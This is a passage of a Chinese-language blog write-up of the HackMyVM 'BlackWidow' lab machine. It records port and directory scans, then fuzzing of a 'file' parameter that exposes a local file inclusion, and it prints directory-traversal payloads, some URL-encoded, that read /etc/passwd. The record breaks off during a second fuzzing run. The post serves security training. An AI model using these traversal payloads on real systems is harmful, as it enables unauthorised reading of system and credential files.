{"id":882,"date":"2025-06-17T13:27:22","date_gmt":"2025-06-17T05:27:22","guid":{"rendered":"http:\/\/162.14.82.114\/?p=882"},"modified":"2025-06-17T13:34:26","modified_gmt":"2025-06-17T05:34:26","slug":"hmv-_-blackwidow","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/882\/06\/17\/2025\/","title":{"rendered":"hmv[-_-]BlackWidow"},"content":{"rendered":"<h1>BlackWidow<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326598.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326598.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616175545909\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326600.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617104520725\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTCP handshake? More like a friendly high-five!\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.100:80\nOpen 192.168.10.100:111\nOpen 192.168.10.100:22\nOpen 192.168.10.100:2049\nOpen 192.168.10.100:3128\nOpen 192.168.10.100:35455\nOpen 192.168.10.100:38113\nOpen 192.168.10.100:38787\nOpen 192.168.10.100:42771\n\nPORT      STATE SERVICE    REASON         VERSION\n22\/tcp    open  ssh        syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 f8:3b:7c:ca:c2:f6:5a:a6:0e:3f:f9:cf:1b:a9:dd:1e (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnsjlNONcku933wJXG6c7zW2yFvbroPDS8PcoWke6IpBG6RbVokkmOyDCdTzYtQbxwb5I17h8AK1d\/a+SPQWjEG71TVzcogM\/RpbtnP27SlYIVRv7de6unovPJlXmEBW5ACHRtRd5OoJ6oyv4FvR3SlbgaJkQEYG3SxBTcPLuSchTqimBh45II3s81SCU0O22j9dxIatzjhlFGOe9bVP9kfC8oF5Llrve3ReRx\/Zt99ByY5oGNZ57dpb+sdjvHdJlBIS02D7mHF+GhW9VixYpg1gJFfcNdaJksbrjVoLXIkC3SSHqgaiFYL5Y5JSEO44oP9Rp+igdgc29ysGXOS417\n|   256 04:31:5a:34:d4:9b:14:71:a0:0f:22:78:2d:f3:b6:f6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMdVV7LG2ve48JMOO6FbWxmdQhQ8KHcOKSkcIlGPmtdA9EUjCh8TRN9q\/lfsZDrq54aJ5brqcI\/pvQqwPFanKW8=\n|   256 4e:42:8e:69:b7:90:e8:27:68:df:68:8a:83:a7:87:9c (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIzpLR6WAXAhIzPtdFobvUkZSDsIL9juu2N70C6tcyxy\n80\/tcp    open  http       syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Site doesn&#039;t have a title (text\/html).\n111\/tcp   open  rpcbind    syn-ack ttl 64 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100003  3           2049\/udp   nfs\n|   100003  3           2049\/udp6  nfs\n|   100003  3,4         2049\/tcp   nfs\n|   100003  3,4         2049\/tcp6  nfs\n|   100005  1,2,3      35455\/tcp   mountd\n|   100005  1,2,3      36358\/udp6  mountd\n|   100005  1,2,3      43763\/tcp6  mountd\n|   100005  1,2,3      48272\/udp   mountd\n|   100021  1,3,4      34813\/udp6  nlockmgr\n|   100021  1,3,4      38113\/tcp   nlockmgr\n|   100021  1,3,4      38665\/tcp6  nlockmgr\n|   100021  1,3,4      53671\/udp   nlockmgr\n|   100227  3           2049\/tcp   nfs_acl\n|   100227  3           2049\/tcp6  nfs_acl\n|   100227  3           2049\/udp   nfs_acl\n|_  100227  3           2049\/udp6  nfs_acl\n2049\/tcp  open  nfs        syn-ack ttl 64 3-4 (RPC #100003)\n3128\/tcp  open  http-proxy syn-ack ttl 64 Squid http proxy 4.6\n|_http-title: ERROR: The requested URL could not be retrieved\n|_http-server-header: squid\/4.6\n35455\/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)\n38113\/tcp open  nlockmgr   syn-ack ttl 64 1-4 (RPC #100021)\n38787\/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)\n42771\/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)\nMAC Address: 08:00:27:2F:F0:D2 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.100\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 84]\n\/docs                 (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.10.100\/docs\/]\n\/.html                (Status: 403) [Size: 279]\n\/company              (Status: 301) [Size: 318] [--&gt; http:\/\/192.168.10.100\/company\/]\n\/js                   (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.10.100\/js\/]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ whatweb $IP       \nhttp:\/\/192.168.10.100 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.100]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326601.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617104752072\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s http:\/\/$IP                                                \n&lt;html&gt;\n&lt;img src=&quot;wallpaper.jpg&quot; alt=&quot;wallpaper&quot; width=&quot;100%&quot; height=&quot;100%&quot;&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ wget http:\/\/$IP\/wallpaper.jpg             \n--2025-06-16 22:48:24--  http:\/\/192.168.10.100\/wallpaper.jpg\nConnecting to 192.168.10.100:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 309964 (303K) [image\/jpeg]\nSaving to: \u2018wallpaper.jpg\u2019\n\nwallpaper.jpg                                   100%[====================================================================================================&gt;] 302.70K  --.-KB\/s    in 0.01s   \n\n2025-06-16 22:48:24 (25.3 MB\/s) - \u2018wallpaper.jpg\u2019 saved [309964\/309964]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ exiftool wallpaper.jpg                                   \nExifTool Version Number         : 13.25\nFile Name                       : wallpaper.jpg\nDirectory                       : .\nFile Size                       : 310 kB\nFile Modification Date\/Time     : 2020:12:13 05:17:12-05:00\nFile Access Date\/Time           : 2025:06:16 22:48:24-04:00\nFile Inode Change Date\/Time     : 2025:06:16 22:48:24-04:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : None\nX Resolution                    : 1\nY Resolution                    : 1\nImage Width                     : 2308\nImage Height                    : 1328\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 2308x1328\nMegapixels                      : 3.1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt wallpaper.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.57% (132.9 MB)           \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n<h3>\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n<h4>rpc + nfs<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ rpcinfo $IP            \n   program version netid     address                service    owner\n    100000    4    tcp6      ::.0.111               portmapper superuser\n    100000    3    tcp6      ::.0.111               portmapper superuser\n    100000    4    udp6      ::.0.111               portmapper superuser\n    100000    3    udp6      ::.0.111               portmapper superuser\n    100000    4    tcp       0.0.0.0.0.111          portmapper superuser\n    100000    3    tcp       0.0.0.0.0.111          portmapper superuser\n    100000    2    tcp       0.0.0.0.0.111          portmapper superuser\n    100000    4    udp       0.0.0.0.0.111          portmapper superuser\n    100000    3    udp       0.0.0.0.0.111          portmapper superuser\n    100000    2    udp       0.0.0.0.0.111          portmapper superuser\n    100000    4    local     \/run\/rpcbind.sock      portmapper superuser\n    100000    3    local     \/run\/rpcbind.sock      portmapper superuser\n    100005    1    udp       0.0.0.0.235.10         mountd     superuser\n    100005    1    tcp       0.0.0.0.167.19         mountd     superuser\n    100005    1    udp6      ::.134.181             mountd     superuser\n    100005    1    tcp6      ::.151.5               mountd     superuser\n    100005    2    udp       0.0.0.0.145.88         mountd     superuser\n    100005    2    tcp       0.0.0.0.151.131        mountd     superuser\n    100005    2    udp6      ::.190.192             mountd     superuser\n    100005    2    tcp6      ::.170.1               mountd     superuser\n    100005    3    udp       0.0.0.0.188.144        mountd     superuser\n    100005    3    tcp       0.0.0.0.138.127        mountd     superuser\n    100005    3    udp6      ::.142.6               mountd     superuser\n    100005    3    tcp6      ::.170.243             mountd     superuser\n    100003    3    tcp       0.0.0.0.8.1            nfs        superuser\n    100003    4    tcp       0.0.0.0.8.1            nfs        superuser\n    100227    3    tcp       0.0.0.0.8.1            nfs_acl    superuser\n    100003    3    udp       0.0.0.0.8.1            nfs        superuser\n    100227    3    udp       0.0.0.0.8.1            nfs_acl    superuser\n    100003    3    tcp6      ::.8.1                 nfs        superuser\n    100003    4    tcp6      ::.8.1                 nfs        superuser\n    100227    3    tcp6      ::.8.1                 nfs_acl    superuser\n    100003    3    udp6      ::.8.1                 nfs        superuser\n    100227    3    udp6      ::.8.1                 nfs_acl    superuser\n    100021    1    udp       0.0.0.0.209.167        nlockmgr   superuser\n    100021    3    udp       0.0.0.0.209.167        nlockmgr   superuser\n    100021    4    udp       0.0.0.0.209.167        nlockmgr   superuser\n    100021    1    tcp       0.0.0.0.148.225        nlockmgr   superuser\n    100021    3    tcp       0.0.0.0.148.225        nlockmgr   superuser\n    100021    4    tcp       0.0.0.0.148.225        nlockmgr   superuser\n    100021    1    udp6      ::.135.253             nlockmgr   superuser\n    100021    3    udp6      ::.135.253             nlockmgr   superuser\n    100021    4    udp6      ::.135.253             nlockmgr   superuser\n    100021    1    tcp6      ::.151.9               nlockmgr   superuser\n    100021    3    tcp6      ::.151.9               nlockmgr   superuser\n    100021    4    tcp6      ::.151.9               nlockmgr   superuser\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ showmount -e $IP\nExport list for 192.168.10.100:<\/code><\/pre>\n<p>\u7a7a\u7684\u3002\u3002<\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326602.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326602.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617105510274\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/company\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.100\/company\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 42271]\n\/.html                (Status: 403) [Size: 279]\n\/assets               (Status: 301) [Size: 325] [--&gt; http:\/\/192.168.10.100\/company\/assets\/]\n\/forms                (Status: 301) [Size: 324] [--&gt; http:\/\/192.168.10.100\/company\/forms\/]\n\/changelog.txt        (Status: 200) [Size: 1175]\n\/Readme.txt           (Status: 200) [Size: 222]\n\/.html                (Status: 403) [Size: 279]\n\/.php                 (Status: 403) [Size: 279]\n\/started.php          (Status: 200) [Size: 42271]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u60c5\u51b5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ whatweb http:\/\/$IP\/company\/\nhttp:\/\/192.168.10.100\/company\/ [200 OK] Apache[2.4.38], Bootstrap, Country[RESERVED][ZZ], Email[info@example.com], Frame, HTML5, HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.100], JQuery, Script, Title[Arsha Bootstrap Template - Index]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s http:\/\/$IP\/company\/changelog.txt                         \nVersion: 3.0.3\n  - Updated Bootstrap to version 5.0.0-beta1\n  - Updated the PHP Email Form to v2.3\n  - Other small fixes and improvements\n\nVersion: 3.0.2\n  - Updated Bootstrap to version 5.0.0-alpha3\n  - Updated all outdated third party vendor libraries to their latest versions\n\nVersion: 3.0.1\n  - Update Bootstrap v5.0 to Alpha 2\n  - Updated all outdated third party vendor libraries to their latest versions\n\nVersion: 3.0.0\n  - Initial release with using the Bootstrap v5.0 (Alpha)\n\nVersion: 2.2.0\n  - Updated the PHP Email Form to v2.1\n  - Other small fixes and improvements\n\nVersion: 2.1.0\n  - Updated Bootstrap to version 4.5.0\n  - Updated the PHP Email Form library to version 2.0 with reCaptcha support\n  - Aded inner-page.html tempalte\n  - Updated all outdated third party vendor libraries to their latest versions\n  - Other small fixes and improvements\n\nVersion: 2.0.0\n  - The template was rebuilt from scratch with the latest Bootstrap version (4.4.1)\n  - Added SMPTP support for the contact form script (Pro)\n  - Added NodeJS NPM Development version (Pro unlimited &amp; Membership members)\n\nVersion: 1.0.0\n  - Initial Release\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s http:\/\/$IP\/company\/Readme.txt   \nThanks for downloading this template!\n\nTemplate Name: Arsha\nTemplate URL: https:\/\/bootstrapmade.com\/arsha-free-bootstrap-html-template-corporate\/\nAuthor: BootstrapMade.com\nLicense: https:\/\/bootstrapmade.com\/license\/<\/code><\/pre>\n<h3>FUZZ LFI<\/h3>\n<p>\u67e5\u770b<code>started.php<\/code>\u6e90\u4ee3\u7801\u7684\u65f6\u5019\u770b\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326603.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326603.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617110732001\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5<code>fuzz<\/code>\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u76f8\u5173\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ wfuzz -c -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-Jhaddix.txt -u &quot;http:\/\/$IP\/company\/started.php?file=FUZZ&quot; --hw 0 2&gt;\/dev\/null \n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.100\/company\/started.php?file=FUZZ\nTotal requests: 929\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000261:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                       \n000000258:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                              \n000000260:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                    \n000000259:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                 \n000000262:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                          \n000000263:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                             \n000000264:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                \n000000265:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                   \n000000266:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                      \n000000267:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                         \n\nTotal time: 0.799150\nProcessed Requests: 929\nFiltered Requests: 919\nRequests\/sec.: 1162.484\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:112:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nviper:x:1001:1001:Viper,,,:\/home\/viper:\/bin\/bash\n_rpc:x:107:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:108:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot; | grep sh | cut -d: -f1\nroot\nsshd\nviper<\/code><\/pre>\n<h3>\u65e5\u5fd7\u5305\u542b<\/h3>\n<p>\u91cd\u65b0\u8fdb\u884cFUZZ\uff0c\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ wfuzz -c -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-Jhaddix.txt -u &quot;http:\/\/$IP\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/FUZZ&quot; --hw 0 2&gt;\/dev\/null     \n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.100\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/FUZZ\nTotal requests: 929\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000023:   200        29 L     43 W       1582 Ch     &quot;..%2F..%2F..%2F%2F..%2F..%2Fetc\/passwd&quot;                                                                                    \n000000016:   200        29 L     43 W       1582 Ch     &quot;\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd&quot;                                         \n000000131:   200        22 L     190 W      1042 Ch 